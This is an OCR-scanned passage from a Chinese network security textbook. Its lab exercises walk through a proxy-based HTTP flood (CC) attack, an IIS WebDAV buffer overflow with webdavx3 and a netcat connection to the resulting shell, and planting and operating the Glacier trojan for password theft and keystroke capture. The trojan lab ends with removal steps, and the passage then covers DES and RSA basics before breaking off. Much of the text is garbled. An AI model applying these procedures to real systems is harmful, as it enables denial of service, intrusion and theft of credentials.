ConnectTime [15S Sendtaitf5 — Secketspo mso 


LoadProxy | haakhttack | DelAttack About 


panaan Sa STREHA 
pM ATA fei 
坎 件 由 CCy1 OITA a A 
DEER- PERE 
[E.S. T]RIFr. gaker 的 支持 
ERASAN ttp: //vv. eviloctal. con 


图 3-44 ”CC 执行 程序 


(2) 在 TargetHttp 文本 框 中 输入 要 攻击 的 目标 地 址 , 单 击 LoadProxy 按钮 ,出 现 如 
图 3-45 所 示 的 对 话 框 。 


SADO: [ore 0) | edm 


E Docments and Settings 
[tiere Visual Studio 8 


[Proxi «2008-10-03 


xeo — — — s 


图 3-45 显示 代理 文件 


C) 找到 代理 文件 , 单 击 “ 打 开 ? 按 钮 ,出 现 如 图 3-46 所 示 的 界面 ,可 以 看 到 代理 文件 中 
的 代理 加 入 了 攻击 的 行列 。 


CC v 2.1b Coded By Fr.Qaker[E. S. T]Beta Version 


TargetHttp [ittp-//mwr. hackeroo. con/ 
Refer frre. google. con. 
Host [eedakeres cm ——0000———— 
Cookie [ 
ConnectTine [15 Sendait[  Sockets[32 — Thsfio 


ed Mddkttack | natas | About | 


更 多 请 访问 http: /yw eviloctal. con. 


图 3-46 查看 攻击 队列 
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(4) 在 主 界面 单 击 AddAttack 按钮 ,开始 攻击 。 多 单 击 AddAttack 几 次 ,每 单 击 一 次 
攻击 强度 就 加 强 一 倍 。 使 用 "netstat-an” 可 以 查看 攻击 状态 。 
(5) 代理 查找 和 验证 软件 花 刺 代理 验证 的 主 界面 如 图 3-47 所 示 。 
O 可 以 在 网 上 搜索 "今日 代理 ,保存 为 如 图 3-48 所 示 格 式 的 记事 本 文件 。 


花 刺 代理 验证 CProxyThorn) 1.8. 


REAR: [QJ77; IE: no proxy 


E 
n 


61.144.222. 49 
61.145.73.211 
219. 149.233. 179 
219. 149.76. 198 
61. 150. 115.245 
202.113.49.22 
61. 179. 12.210 
61. 179. 12.213 
219. 238.6. 194 
218.75.17.195 


P 代理 2. tzt - 记事 本 DER 


XH) SO 格式 人 0) FEV 
00 


202.117.27.65:8080 


IPTTTTERIIS 


220.189.220.8 
61.179. 12.212 
211. 90. 132.29 


EEE] 


E Fritt 

回 华 中 大 在 线 -今日 代理  http://info. hustonline. net/info/index/proxyzhow. aspx 

回 西 交 共 享 -代理 大 全 http://www. x; tushare. con/prozy. aspx 219.218.128.218:3128 
202.195.210.9:3128 


图 3-47 查找 验证 图 3-48 代理 文件 


CD) 在 花 刺 代理 验证 主 界面 中 单 击 * 导 入 ?按钮 , 单 击 “ 验 证 全 部 "按钮 。 对 于 可 用 的 代 
理 选 定 , 单 击 * 导 出 选 定 ?按钮 , 即 可 使 之 成 为 CC 攻击 可 用 的 代理 文件 。 


侨 训 3.6 缓冲 区 溢出 攻击 


【 实 训 目的 】 

IIS 5.0 默认 提供 了 对 WebDAV 的 支持 ,WebDAYV 可 以 通过 HTTP 向 用 户 提供 远程 
文件 存储 的 服务 。 但 IIS 5.0 包含 的 WebDAV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数 
据 ,远程 攻击 者 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权限 在 
系统 上 执行 任意 指令 。 

IIS 5. 0 的 WebDAV 使 用 了 ntdll. dll 中 的 一 些 API 函数 ,而 这 些 函 数 存在 一 个 缓冲 
溢出 漏洞 。 通 过 对 WebDAV 的 畸形 请 求 可 以 触发 这 个 溢出 ,成 功利 用 这 个 漏洞 可 以 获得 
LocalSystem 权限 。 这 意味 着 ,入 侵 者 可 以 获得 主机 的 完全 控制 能 力 。 

【 实 训 环境 】 

(1) 局 域 网 环境 , 预 装 Windows Server 2003 的 多 台 主 机 ,实验 前 停止 运行 杀毒 软件 。 

(2) 黑客 软件 WebDAVScan 和 WebDAVx3。 

【 实 训 内 容 】 

用 黑客 软件 WebDAVScan 和 WebDA Vx3 扫描 并 攻击 有 缓冲 区 溢出 漏洞 的 计算 机 。 

(D) 运行 WebDAVScan, 单 击 “ 扫 描 " 按 钮 ,对 有 漏洞 的 主机 进行 漏洞 扫描 ,如 图 3-49 
所 示 。 


54 


(2) 执行 WebDAVx3 对 有 漏洞 的 计算 机 发 起 攻击 ,如 


G 


3 


PARERE) 


IPAE 参数 设置 

起 始 IF: fisz. 168. 1,10 结束 IP: | 168.1.254 m [ioo 超时 [0000 E] fo 
Hë 停止 

IP Address NITP Banner WebDAV 

192. 168.1. 11 Wicrosoft-IIS/S. 1 Enable 


图 3-49 WebDA VScan 扫描 


CMD.EXE - webdavx3.exe 19; 11 


IF: \too ls webdavx\\lebDav%3>webdavx3.exe 192.168.1.11 

IIS WebDAV overflow remote exploit by isno(xfocus.org 

start to try offset, 

if STOP a long time, you can press ^C and telnet 192.168.1.11 7788 
try offset: 8 

try offset: 1 

luaiting for iis restart 

try offset: 2 

aiting for iis restart 

try offset: 3 


图 3-50 WebDAVx3 攻击 


攻击 结果 是 获得 了 对 远程 计算 机 的 超级 用 户 访问 权 , 如 图 3-51 所 示 。 


C:Vnc -vu 192.168.1.11 7788 

192.168.1.11: inverse host lookup failed: h errno 11004: NO DRTR 
(UNKNOWN) [192.168.1.11] 7788 (?) open 

Microsoft Windows 2803 [Version 5.00.2195] 

(C) 版 权 所 有 1998-2010 Microsoft Corp.| 

C: WINNTVSysten32» 

V, Fe: alueen hih VERB SERRE: 

2011-8-16 05:51:38 192.168.1.208 - 192.168.1.25h 80 LOCK 
/RRRRRnRRRRRRRRRRRRRRRRRRRRRRRRRRARRARRRRRRRRRRRRRRRRRARRRRRRRR 
RRRRRRRRARRRRRRRRARRRRRRRRARRRRRARRRRRRRRRRRRRRRRRRRRARRRRRRRRRRRRRRRRRRRRRR 
AAAAAAAAAAAAAAAAANAAAAAAAAAAAAAAAAAAAAAAAAAAANAAA 


Anaa noanaanaannae ie LEE ME RMDUSRADRIER E 
PE 


pripean RRNA 
kaer 
ffilonidomfafdfgfhinhn1aljbeaaaaaalinnnmpnnnpdklojieaaaaaaipefpainlnpepppppp 
gekbaaaaaaaai jehaigeijdnaaaaaaaamhefpeppppppppile 
fpaidoiahijefpiloaaaabaaaoideaaaaaaibngaabaaaaaolagibngaaeaaaaailagdneceoeoe 
ohfpbidngaeikagegdnf jhFpjikagegdnFihrpcggknggdnf j 
FinFokppogolpoFifailhnpai jehpcndileeceamafliaaaaaanhaaeeddccbbddnandolonoihh 
DPPPDpCecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 
 NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNHNNNNNNNHNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 


图 3-51 攻击 结果 
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&u 3.7 木马 攻击 


【 实 训 目的 】 

(1) 通过 对 木马 的 练习 ,理解 和 掌握 木马 传播 和 运行 的 机 制 。 

D 通过 手动 删除 木马 ,掌握 检查 木马 和 删除 木马 的 技巧 ,学 会 防御 木马 的 相关 知识 ， 
加 深 对 木马 的 安全 防范 意识 。 

【 实 训 环境 】 

(1) 扫描 端口 工具 : 20CN IPC 扫描 器 ; 木马 程序 : 冰河 ROSE 版 。 

(2) 局 域 网 环境 , Windows 微机 若干 台 。 

【 实 训 内 容 】 


1. 入 侵 实 验 
CD 扫描 网 络 中 的 IPC$ 漏洞 并 植 人 木马 ,打开 扫描 器 ,如 图 3-52 所 示 。 


ZONH M ZPC 1.0 afa 


T- t — —, rX8& E 


má[ a j 
广 一 | 


ut [i32 168 003. 049 


| 
T RRE F OMMRPI 
Li] 


保存 结果 
FIE) neon net -退出 


图 3-52 20CN IPC 扫描 器 


(2) 设置 扫描 的 IP 开始 地 址 和 结束 地 址 ,如 图 3-53 所 示 。 


270CN 扫 搞 之 PCT-0 


m asa 
结束 [sz it35 fip 


3-53 设置 扫描 地 址 


第 3 章 “黑客 攻击 技术 “101 
MV 


例如 ,扫描 TP 地 址 在 192. 168. 3. 20— 192. 168. 3. 50 这 一 区 间 内 的 主机 ,设置 步 进 为 
1 ,逐个 扫描 主机 ,线程 数 默认 64 ,线程 时 延 默 认 50, 标 号 见 “1”。 选 择 要 植 入 的 木马 程序 , 先 
择 “ 冰 河 木 马 ”, 见 标号 *2”。 扫 描 过 程 显 示 每 个 IP 的 扫描 结果 , 见 标号 *3”。 扫 描 完 成 后 会 
自动 植 人 有 IPC $ 漏 洞 的 主机 , 接 下 来 就 可 以 控制 了 。 


2. 连接 登录 远程 主机 
(1) 打开 冰河 木马 程序 客户 端 ,选择 "文件 ”> 搜索 计算 机 ?命令 ,设置 起 始 域 , 起 始 地 
址 和 终止 地 址 ,进行 如 下 设置 : 监听 端口 ,延迟 选择 默认 值 , 如 图 3-54 所 示 。 


WÈ ROSE LBI 专 版 ] 
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图 3-54 木马 客户 端 设置 


(2) 搜索 结果 见 标号 “2”, 在 192. 168. 3. 28 和 192. 168. 3. 29 前 面 是 OK 表示 可 以 连 
接 ,其 他 主机 都 是 ERR 表示 不 能 建立 连接 。 或 者 选择 “文件 >“ 添加 计算 机 ”命令 ,输入 扫描 
并 已 植 人 木马 的 远程 主机 下 , 见 标号 “1”, 访 问 口令 为 空 ,监听 端口 默认 7626, 如 图 3-55 所 示 。 
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图 3-55 设置 地 址 和 端口 


NZ 网 络 安全 技术 
(3) 看 到 标号 “2? 处 出 现 192. 168. 3. 28 和 192. 168. 3. 29 两 台 远 程 主 机 的 IP, 表 示 可 以 
与 这 两 台 主 机 连接 。 
3. 控制 操纵 远程 主机 


CD 单 击 主机 的 IP 地 址 ,与 它 建立 连接 ,选择 192. 168. 3. 28 ,如 图 3-56 Bros. nh 
现 该 主机 的 盘 符 , 单 击 可 以 打开 查看 ,并 且 可 以 下 载 其 中 的 文件 ,保存 到 本 机 。 
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图 3-56 建立 连接 


(2) 单 击 命令 控制 台 , 可 以 进一步 控制 主机 ,如 图 3-57 所 示 。 左 边 出 现 口 令 类 命令 、 控 
制 类 命令 、 网 络 类 命令 ,文件 类 命令 .注册 表 读 写 .设置 类 命令 。 
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图 3-57 控制 主机 


O 口令 类 命令 ,分 系统 信息 及 口令 .历史 口令 和 击 键 记 录 。 系 统 信息 及 口令 如 图 3-58 
所 示 。 
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图 3-58 口令 类 命令 


有 4 个 按钮 ,可 以 查看 远程 主机 的 系统 信息 ,包括 其 详细 配置 情况 .系统 设置 .各 盘 符 的 
使 用 情况 等 ,还 可 以 获取 开机 口令 ,缓存 口令 、 其 他 口令 。 

@ 控制 类 命令 ,分 捕获 屏幕 ,发 送信 息 、 进 程 管理 、 窗 口 管理 .系统 控制 \ 鼠 标 控制 及 其 
他 控制 。 捕 获 屏幕 如 图 3-59 所 示 。 
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图 3-59 控制 类 命令 


屏幕 控制 可 以 查看 远程 主机 的 屏幕 , 见 标 号 *1”, 掌 握 远 程 主机 上 的 一 举 一 动 ,还 可 以 根 
据 网 络 情况 制定 不 同 的 传送 方案 , 见 标 号 "2”。 发 送信 息 屏 幕 如 图 3-60 所 示 。 
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图 3-60 远程 主机 画面 


可 以 向 被 控制 的 主机 发 送 一 条 消息 ,在 远程 主机 将 跳出 一 个 对 话 框 , 见 标号 "1” 处 ,本 机 
上 可 以 设置 跳出 对 话 框 的 标题 .图标 类 型 (提示 ,警告 ,通知 ) 信息 正 文 .按键 类 型 (确定 、 取 
消 、 忽 略 、 调 试 ), 见 标号 *2” 处 。 控 制 进程 屏幕 如 图 3-61 所 示 。 
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图 3-61 控制 进程 屏幕 


@ 网 络 类 命令 有 创建 共享 .删除 共享 和 网 络 信息 ,如 图 3-62 所 示 。 

“创建 共享 "可 以 把 远程 主机 上 的 文件 设 为 共享 并 设 定 共享 名 。“ 删 除 共享 " 则 把 远程 主 
机 上 的 共享 删除 ,消除 入 侵 痕 迹 。“ 网 络 信息 ”可 查看 远程 主机 的 网 络 连接 等 信息 。 

@ 文件 类 命令 : 修改 远程 主机 的 文件 信息 。 注 册 表 读 写 : 修改 远程 主机 的 注册 表 信 
B. 设置 类 命令 : 设置 远程 主机 的 一 些 配 置 。 
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图 3-62 网络 类 命令 
4. 查 杀 木马 


当 机 器 无 故 经 常 重启 、 密 码 信息 泄露 .桌面 不 正常 时 ,可 能 中 了 木马 程序 ,需要 进行 
杀毒 。 

(1) 判断 是 否 存在 木马 : 一 般 病毒 都 要 修改 注册 表 , 可 以 在 注册 表 中 查看 到 木马 的 痕 
迹 。 在 “运行 "对 话 框 中 ,输入 regedit, 这 样 就 打开 了 注册 表 编辑 器 。 

依次 打开 子 键 目 录 HKEY_LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\ 
CurrentVersion\Run ,如 图 3-63 所 示 。 


图 3-63 子 键 目录 


(2) 在 目录 中 发 现 第 一 项 的 数据 为 C: \WINDOWS\system32\Kernel32. exe, 见 标号 
“1”,Kernel32. exe 就 是 冰河 木马 程序 在 注册 表 中 加 入 的 键 值 ,将 该 项 删除 。 

打开 HKEY_LOCAL_MACHINE\SOFTWARE V Microsoft \ Windows\ Current Version V 
RunServices, 如 图 3-64 所 示 。 
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图 3-64 删除 键 值 Kernel32. exe 


(3) 在 目录 中 也 发 现 了 一 个 键 值 *C: \WINDOWS\system32\Kernel32. exe”, 见 标号 
“1”, 将 其 删除 。Run 和 RunServices 中 存放 的 键 值 是 系统 启动 的 程序 。 

一 般 的 病毒 木马 .后 门 等 都 是 存放 在 这 些 子 键 目 录 下 ,所 以 要 经 常 检查 这 些 子 键 日 录 
下 的 程序 ,如 有 不 明 程 序 , 则 要 认真 检查 。 删 掉 其 在 注册 表 中 的 启动 项 后 ,再 删除 病毒 原 
文件 ， 

打开 C:\WINDOWS\system32, 找 到 Kernel32. exe 将 其 删除 ,如 图 3-65 所 示 o 
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图 3-65 删除 文件 Kernel32. exe 


(D 打开 C:\WINDWOS\system32, 找 到 Sysexplr. exe 将 其 删除 ,如 图 3-66 所 示 。 之 
后 重启 ,冰河 木马 就 彻底 被 删除 了 。 
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图 3-66 ”删除 文件 sysexplr. exe 


(5) 在 控制 端 再 用 冰河 木马 搜索 可 连接 主机 ,如 图 3-67 所 示 。 我 们 发 现 已 经 搜索 不 到 
192. 168. 3. 28 主机 ,而 另 一 台 192. 168. 3. 29 主机 仍旧 是 可 连接 的 。 
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图 3-67 搜索 可 连接 主机 
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公 钥 基 础 设施 


密码 技术 是 信息 系统 安全 的 关键 技术 ,本 章 介绍 密码 学 的 基本 知识 ,常用 加 密 方法 及 应 
用 、 公 钥 基 础 设施 PKI 的 基本 组 成 及 应 用 ; 重点 介绍 Windows Server 2003 的 证 书 服务 .证 
书 申请 和 证 书 管理 。 


4.1 密码 技术 


4.1.1 密码 学 的 定义 


密码 学 (cryptology) 是 研究 如 何 实现 秘密 通信 的 科学 ,包含 密码 编码 学 和 密码 分 析 学 。 
密码 编码 学 (cryptography) 是 主要 研究 对 信息 进行 编码 ,实现 信息 保密 性 的 科学 ; 而 密码 分 
析 学 (cryptanalytics) 是 主要 研究 .分析 ,破译 密码 的 科学 。 因 特 网 在 给 人 们 提供 极 大 方便 的 
同时 ,也 存在 安全 隐患 ,一些 基于 TCP/IP 的 服务 是 极 不 安全 的 ,为 了 使 网 络 变 得 安全 并 充 
分 利用 其 商业 价值 ,人 们 选择 了 数据 加 密 和 基于 加 密 技术 的 身份 认证 。 

密码 学 具有 4 个 基本 功能 : 保密 性 , 非 授权 者 无 法 知道 消息 的 内 容 ; @ 完 整 性 ,消息 
的 接收 者 应 该 能 够 验证 消息 在 传输 过 程 中 没有 被 改变 ; @ 鉴 别 ,消息 的 接收 者 应 该 能 够 确 
认 消 息 的 来 源 ; @ 不 可 否认 性 ,发 送 方 不 能 否认 已 经 发 送 的 消息 。 


4.1.2. 密码 学 的 发 展 历史 


密码 学 的 发 展 大 致 可 以 分 为 3 个 阶段 。@ 古 代 至 1949 年 ,手工 作坊 式 的 加 密 术 ,还 不 
是 科学 ; 密码 学 专家 凭 直觉 和 信念 进行 密码 设计 ,而 对 密码 的 分 析 也 多 基于 密码 分 析 者 的 
直觉 和 经 验 。@1949 一 1975 年 ,Shannon 发 表 了 《保密 系统 的 通信 理论 ) 标 志 着 密码 学 成 为 
一 门 科学 。@1976 年 至 今 ,1976 年 ,Diffie 和 Hellman 的 “密码 学 发 展 的 新 方向 ”导致 了 密 
码 学 上 的 一 场 革命 ,标志 着 公 钥 密码 学 的 出 现 。 


4.1.3 香农 模型 


密码 学 有 几 个 最 基本 的 术语 ,分 别 是 明文 、 密 文 和 密 钥 。 下 面 介绍 密码 系统 的 香农 模 
型 ,如 图 4-1 所 示 ,来 解释 这 3 个 基本 术语 。 

在 该 模型 中 ,发 送 者 要 传输 的 消息 M 被 称 为 明文 (plaintext) ,明文 可 以 是 文本 文件 、 位 
图 等 ,明文 通过 加 密 器 加 密 后 得 到 C 被 称 为 密 文 (ciphertext) ,将 明文 进行 编码 变 成 密 文 的 
过 程 称 为 加 密 (encryption) , 记 为 ,其 逆 过 程 称 为 解密 (decryption) , 记 为 D. 


Sam MEE 


密码 攻击 者 | oM, 
i 


密 文 C1 


明文 UM 一 一 =| MERE 


图 4-1 香农 模型 


对 明文 进行 加 密 时 采用 的 一 组 规则 或 变换 称 为 加 密 算 法 (encryption algorithm) ,对 密 
文 进行 解密 时 所 采用 的 一 组 规则 或 变换 称 为 解密 算法 (decryption algorithm)。 加 密 和 解密 
通常 都 是 在 一 组 密 钥 (Key) 的 控制 下 进行 的 ,分 别称 为 加 密 密 钥 和 解密 密 钥 。 

要 传输 消息 M, 首 先 要 加 密 得 到 密 文 C, 即 CEM) ,接受 者 收 到 C 后 ,要 对 其 进行 解 
密 , 即 D(C) ,为 了 保证 将 明文 恢复 ,要 求 DEM) )=M。 一 个 密码 系统 (或 称 为 密码 体制 ) 
由 密码 算法 (Cryptography Algorithm) ,明文 、 密 文 和 密 钥 组 成 ,它们 称 为 明文 空间 、 密 文 空 
间 和 密 钥 空间 。 


4.1.4 密码 体制 的 分 类 


按 密 钥 使 用 的 数量 不 同 ,将 密码 体制 分 为 对 称 密码 (又 称 为 单 钥 密码 )(symmetric) 和 非 
对 称 密 码 ( 又 称 为 公 钥 密 码 )(asymmetric) 。 对 于 对 称 密 钥 密码 而 言 , 按 照明 文 处 理 方式 的 
不 同 ,又 可 以 分 为 分 组 密码 (block cipher) 和 流 密码 (stream cipher) 。 


1， 对 称 密码 体制 


在 对 称 密 钥 密码 体制 中 ,加 密 密 钥 和 解密 密 钥 相 同 , 彼 此 之 间 很 容易 相互 确定 。 在 公 钥 
密码 体制 中 ,加 密 密 钥 和 解密 密 钥 不 相同 ,而 且 通过 计算 很 难 从 一 个 密 钥 推出 另 一 个 密 钥 。 

在 对 称 密 钥 密码 体制 中 , 密 钥 需要 经 过 安全 的 通道 由 发 送 方 传 给 接收 方 ,因此 ,这 种 密 
码 体制 的 安全 性 就 是 密 钥 的 安全 性 。 这 种 密码 体制 的 优点 是 安全 性 高 和 加 密 速度 快 ; 缺点 
是 随 着 网 络 规模 扩大 , 密 钥 的 管理 成 为 一 个 难点 ,无 法 解决 信息 确认 问题 并 缺乏 自动 检测 密 
钥 泄露 的 能 力 。 

2. 公 钥 密码 体制 

在 公 钥 密码 体制 中 ,加 密 密 钥 和 解密 密 钥 是 不 同 的 ,此 时 不 需要 通过 专门 的 安全 通道 来 
传送 密 钥 。 公 钥 密 码 体制 的 优点 是 简化 了 密 钥 管理 的 问题 ,可 以 拥有 数字 签名 等 新 功能 ; 
缺点 是 算法 一 般 比 较 复杂 ,加 密 、 解 密 速度 慢 。 

网 络 中 的 加 密 普 遍 采 用 对 称 密 钥 密码 和 公 钥 密码 相 结合 的 混合 密码 体制 , 即 加 解密 采 
用 对 称 密 钥 密码 , 密 钥 传送 采用 公 钥 密码 。 这 样 既 解 决 了 密 钥 管理 的 难题 ,又 解决 了 加 解密 
速度 慢 的 问题 。 

3. 密码 分 析 


密码 分 析 是 指 密 文 分 析 者 在 不 知道 密 钥 的 情况 下 ,从 密 文 恢复 出 明文 。 成 功 的 密码 分 
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网 络 安全 技术 


析 不 仅 能 够 恢复 出 消息 明文 和 密 钥 ,而 且 能 够 发 现 密码 体制 的 弱点 ,从 而 控制 通信 。 常 见 的 
密码 分 析 方 法 有 以 下 4 类 。 

CD 唯 密 文 攻击 (ciphertext only) 。 密 码 破 译 者 除了 拥有 截获 的 密 文 ,以 及 对 密码 体制 
和 密 文 信息 的 一 般 了 解 外 ,没有 什么 其 他 可 以 利用 的 信息 用 于 破译 密码 。 在 这 种 情况 下 进 
行 密码 破译 是 最 困难 的 ,经 不 起 这 种 攻击 的 密码 体制 被 认为 是 完全 不 保密 的 。 

(2) 已 知 明文 攻击 (known plaintext) 。 密 码 破 译 者 不 仅 掌 握 了 相当 数量 的 密 文 ,还 有 
一 些 已 知 的 明 一 密 文 对 (通过 各 种 手段 得 到 的 ) 可 供 利 用 。 现 代 的 密码 体制 (基本 要 求 ) 不 仅 
要 经 受 得 住 唯 密 文 攻击 ,而 且 要 经 受 得 住 已 知 明文 攻击 。 

(3) 选择 明文 攻击 (chosen plaintext) 。 密 码 破译 者 不 仅 能 够 获得 一 定数 量 的 明 一 密 文 
对 ,还 可 以 用 它 选择 的 任何 明文 ,在 同一 未 知 密 钥 的 情况 下 加 密 相应 的 密 文 。 密 码 破 译 者 暂 
时 控制 加 密 机 。 

(4) 选择 密 文 攻击 (chosen ciphertext) 。 密 码 破 译 者 能 选择 不 同 的 被 加 密 的 密 文 ,并 
还 可 得 到 对 应 的 解密 的 明文 , 据 此 破译 密 钥 及 其 他 密 文 。 密 码 破 译 者 暂时 控制 解密 机 。 

一 个 好 的 密码 系统 应 该 满足 下 列 要 求 。 

CD 系统 即使 理论 上 达 不 到 不 可 破 ,实际 上 也 要 做 到 不 可 破 。 也 就 是 说 ,从 截获 的 密 文 
或 已 知 的 明文 一 密 文 对 ,要 确定 密 钥 或 任何 明文 在 计算 上 是 不 可 行 的 。 

@ 系统 的 保密 性 是 依赖 于 密 钥 的 ,而 不 是 依赖 于 对 加 密 体制 或 算法 的 保密 。 

@ 加 密 和 解密 算法 适用 于 密 钥 空间 的 所 有 元 素 。 

@ 系统 既 易 于 实现 又 便于 使 用 。 


4.1.5 对 称 密码 算法 


对 称 密码 体制 根据 对 明文 加 密 方式 的 不 同 而 分 为 分 组 密码 和 流 密码 。 前 者 按 一 定 长 度 
(如 64B、128B) 对 明文 进行 分 组 ,然后 以 组 为 单位 进行 加 解密 ; 后 者 则 不 进行 分 组 ,而 是 按 
位 进行 加 解密 。 

分 组 密码 系统 对 不 同 的 组 采用 同样 的 密 钥 K EMRE. WEAH Y =Y, YY; 
Y。, 则 对 明文 组 X= Xi Xo Xs X, MAHAK 加 密 可 得 到 Y= Ek CX) EK CX) Ek CX, 
Exk(X。)。 流 密码 的 基本 思想 是 利用 密 钥 K 产生 一 个 密 钥 流 Z = Z Z …, 并 使 用 如 下 规则 
加 密 明 文 串 XX, X; Y =Y, Ys Ea (X )Ez (X7. 


1. 分 组 密码 原理 
分 组 密码 基本 模型 如 图 4-2 Bron 。 


Key | | Key 


| | 


一 -一 = Encrypt Decrypt | 一 一 
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图 42 分 组 密码 基本 模型 
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其 中 ,明文 二 (Xi ,Xa ,Xs，…,X,) 为 分 组 长 度 为 m 的 序列 , 密 文 Y= (Yi Y2 TY) 
为 分 组 长 度 为 n 的 序列 ,加 密 与 解密 过 程 由 密 钥 控制 。 

一 个 分 组 密码 的 实质 就 是 一 种 对 应 , 即 明文 X; ERAK 的 作用 下 对 应 得 到 密 文 Y;。 

分 组 密码 算法 的 加 密 和 解密 过 程 表示 为 Ex OO —Y.Dk (0 - X, 

分 组 密码 算法 ,加 /解密 密 钥 是 相同 的 ,这 种 算法 也 叫 秘密 密 钥 算法 或 单 密 钥 算法 ， 
它 要 求 发 送 者 和 接收 者 在 安全 通信 之 前 ,商定 一 个 密 钥 。 对 称 算法 的 安全 性 依赖 于 密 
钥 ,泄露 密 钥 就 意味 着 任何 人 都 能 对 消息 进行 加 /解密 。 只 要 通信 需要 保密 , 密 钥 就 必须 

分 组 密码 主要 有 两 个 优点 , 即 易于 标准 化 和 易于 实现 同步 。 但 是 , 它 具 有 一 定 的 局 限 
性 。 比 如 ,分 组 密码 不 便于 隐藏 明文 的 数据 模式 ,对 于 重 放 、 插 入 、 删 除 等 攻击 方式 的 抵御 能 
力 不 强 等 ,但 是 可 以 通过 合理 的 方法 消除 这 些 局 限 性 。 


2. 数据 加 密 标准 


最 具有 影响 力 的 对 称 密码 体制 是 1977 年 美国 国家 标准 局 颁布 的 数据 加 密 标 准 (data 
encryption standard,DES) 密 码 体制 , 它 采 用 了 名 为 DES 的 著名 的 分 组 密码 算法 。DES 是 
分 组 长 度 为 64 位 的 分 组 密码 算法 , 密 钥 长 度 也 是 64 位 ,其 中 每 8 位 有 一 位 奇偶 校 验 位 , 因 
此 有 效 密 钥 长 度 为 56 位 。DES 算法 是 公开 的 ,其 安全 性 依赖 于 密 钥 的 保密 程度 。DES 加 
密 过 程 如 图 4-3 所 示 。 

初始 置换 TP 的 作用 是 ,将 64 位 明文 数据 用 TP 进行 置换 ,得 到 一 个 乱 序 的 64 位 的 
明文 分 组 ; 初始 逆 置 换 IP-1 的 作用 与 之 相反 。DES 解密 过 程 与 加 密 过 程 算法 相同 , 密 
钥 相 同 ( 子 密 钥 顺序 相反 ) ,解密 过 程 是 加 密 过 程 的 * 逆 ”运算 。DES 解密 过 程 如 图 4-4 
所 示 。 


输入 64 位 明文 数据 输入 64 位 密 文 数据 
初始 置换 IP 初始 置换 IP 
在 密 钥 控制 下 16 轮 迭代 在 密 钥 控制 下 16 轮 迭代 


初始 逆 置换 IP- 


输入 64 位 明文 数据 


交换 左 、 右 32 位 
初始 道 置换 IP- 


输入 64 位 密 文 数据 


图 4-3 DES 加 密 过 程 图 4-4 DES 解密 过 程 


3. DES 软件 工具 
流行 的 经 典 DES 软件 工具 很 多 ,DES Tool 演示 加 密 、 解 密 效 果 如 图 4-5 所 示 。 
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名 DES Tool by TinXueTnan 


DES 加 密 解 密 工具 2.06.42 
FENE 
SHL: [poo98u7 Temes 
OEXUHARAER OFXACHAIR OSUREFHER 
Cre Chear NER SEE ] 


9e: €x: 


qazwsxedcrfvtabyhnumik,ol.o;/ [141234567890 FES27F9E152AD1EDEE3D182088765894375173CB737E4 = | 
E7086759CE882DE688398920F A 12FB849012066B429E6 
70F041 


图 4-5 DES Tool 加 密 、 解 密 效果 图 
4.1.6 公 钥 密码 算法 


在 对 称 密码 体制 中 ,加 密 密 钥 和 解密 密 钥 相同 或 者 说 通过 加 密 密 钥 进行 简单 的 推导 和 
运算 后 能 够 得 到 解密 密 钥 。 在 对 称 密码 系统 中 ,消息 的 发 送 方 和 接收 方 必须 在 密 文 传输 之 
前 通过 安全 隧道 进行 密 钥 传输 ,但 是 由 于 实际 的 传输 信道 的 安全 性 并 不 理想 ,所 以 密 钥 在 传 
输 的 过 程 中 可 能 会 暴露 ,于 是 提出 了 公 钥 密码 体制 。 

1. 公 钥 密码 原理 


公 钥 密码 基本 模型 如 图 4-6 所 示 。 


Encryption | | Decryption 
Key Key 


| | 
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图 4-6 公 钥 密码 基本 模型 


公 钥 密码 的 最 大 优点 在 于 针对 密 钥 管理 方法 的 改进 。 在 公 钥 密码 系统 中 ,用 做 加 密 的 
密 钥 不 同 于 用 做 解密 的 密 钥 ,加密 密 钥 叫做 公开 密 钥 (简称 公 钥 ) ,解密 密 钥 叫做 私人 密 钥 
(简称 私 钥 )。 加 密 密 钥 是 公开 的 ,任何 人 都 可 以 采用 这 些 加 密 密 钥 对 自己 准备 传输 的 信息 
进行 加 密 。 同 时 ,只 有 正确 地 接收 方才 能 够 使 用 自己 所 保管 的 解密 密 钥 对 密 文 进行 解密 ,并 
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且 解 密 密 钥 自己 妥善 保管 。 与 对 称 密码 体制 相 比 , 公 钥 密码 中 的 密 铀 在 处 理 和 发 送 上 更 为 
方便 和 安全 。 

公 钥 密码 算法 (也 叫 非 对 称 密码 算法 ), 是 因为 加 密 密 钥 能 够 公开 , 即 陌生 者 能 用 加 密 密 
钥 加 密 信息 ,但 只 有 用 相应 的 解密 密 钥 才能 解密 信息 。 而 且 解密 密 钥 不 能 根据 加 密 密 钥 计 
算出 来 (至 少 在 合理 假定 的 长 时 间 内 )。 

ASH K. 表示 , 私 钥 用 Ka 表示 ,明文 用 M 表示 , 密 文 用 C 表示 。 

公 钥 密码 加 密 过 程 表示 为 Ex.(M) = C。 公 钥 密码 解密 过 程 表 示 为 Dx, CO — M. 

有 时 ,消息 用 私 铀 加 密 而 用 公 钥 解密 ,这 个 过 程 称 做 数字 签名 (后 面 将 详细 介绍 ) ,尽管 
可 能 产生 混淆, 但 这 些 运算 可 分 别 表示 为 Dr, (M) =C,Ex.(C)=M， 

当前 , 公 铀 密码 算法 与 对 称 密码 算法 比较 ,要 慢 得 多 ,这 使 得 公 钥 密码 算法 主要 用 在 小 
量 数据 加 密 , 例 如 用 公 钥 密 码 加 密 DES 密 钥 K 的 传送 。 


2. 公 钥 密码 算法 RSA 


RSA 算法 是 R. Rirest, Asllalnlr 和 L. Adleman F 1977 年 在 美国 麻 省 理工 学 院 开发 
的 ,于 1978 年 首次 公布 ,是 最 流行 的 公 钥 密码 算法 ,使 用 长 度 可 以 变化 的 密 钥 。RSA 是 第 
一 个 既 能 用 于 数据 加 密 也 能 用 于 数字 签名 的 算法 。RSA 是 目前 最 有 影响 力 的 公 钥 密码 算 
法 ,能 够 抵抗 到 目前 已 知 的 所 有 密码 攻击 ,已 被 ISO 推荐 为 公 钥 数据 加 密 标 准 。 

RSA 密码 算法 的 安全 性 建立 在 大 数 分 解难 题 之 上 ,该 算法 所 用 的 公 钥 和 私 钥 是 一 对 足 
